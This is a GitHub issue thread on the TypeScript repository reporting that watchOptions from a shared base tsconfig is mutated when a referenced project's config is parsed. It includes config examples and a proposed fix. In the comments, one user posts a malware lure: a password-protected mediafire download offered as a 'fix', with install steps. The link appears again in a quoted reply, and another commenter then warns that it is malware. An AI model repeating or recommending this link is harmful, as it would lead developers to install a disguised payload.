### ISSUE TITLE
watchOptions is override by references project's tsconfig if they extends shared base config

### ISSUE THREAD

**Issue by pilaoda** [microsoft/TypeScript#59771]
### 🔎 Search Terms

watchOptions, excludeDirectories

### 🕗 Version & Regression Information

- I was unable to test this on prior versions because I should debug deep into javascript call stack to check the bug.

### 💻 Code

tsconfig.base.json
```json
{
  "watchOptions": {
    "excludeDirectories": ["**/node_modules"],
  }
}
```

tsconfig.A.json
```json
{
  "extends": "./tsconfig.base.json",
  "watchOptions": {
    "excludeDirectories": ["**/excludes_by_A"],
  }
}
```

tsconfig.B.json
```json
{
  "extends": "./tsconfig.base.json",
  "references": [
    {
      "path": "./tsconfig.A.json"
    }
  ],
}
```

### 🙁 Actual behavior

tsconfig.B.json `watchOptions.excludeDirectories` become `["**/excludes_by_A"]`

### 🙂 Expected behavior

tsconfig.B.json `watchOptions.excludeDirectories` should be `["**/node_modules"]`

### Additional information about the issue

I found this bug in the typescript.js call stack using javascript debugger, I believe the problem is caused by this line:https://github.com/microsoft/TypeScript/blob/64931f7c3dd0cda1265ab8307acf60aa5d2e060b/src/compiler/commandLineParser.ts#L3329
`result.watchOptions` here is from the cache of tsconfig.base.json, and the tsconfig.B.json direct reference it, and the parsing of project reference: tsconfig.A.json modify this cached object directly!
Modify it into `assign({}, result.watchOptions, ownConfig.watchOptions)` may solve this problem, while I believe we can also do a deep copy here:https://github.com/microsoft/TypeScript/blob/64931f7c3dd0cda1265ab8307acf60aa5d2e060b/src/compiler/watchPublic.ts#L959
to avoid direct ref cached object and eliminate any future cache config bug.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by pilaoda** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I believe this is just a stupid hacker choose the wrong guy. Microsoft what are you doing?

**Comment by MartinJohns** [comment]
@pilaoda Please edit / remove your comment. It currently contains the link to the malware, making **you** spread it. The comment you quote has been deleted already.
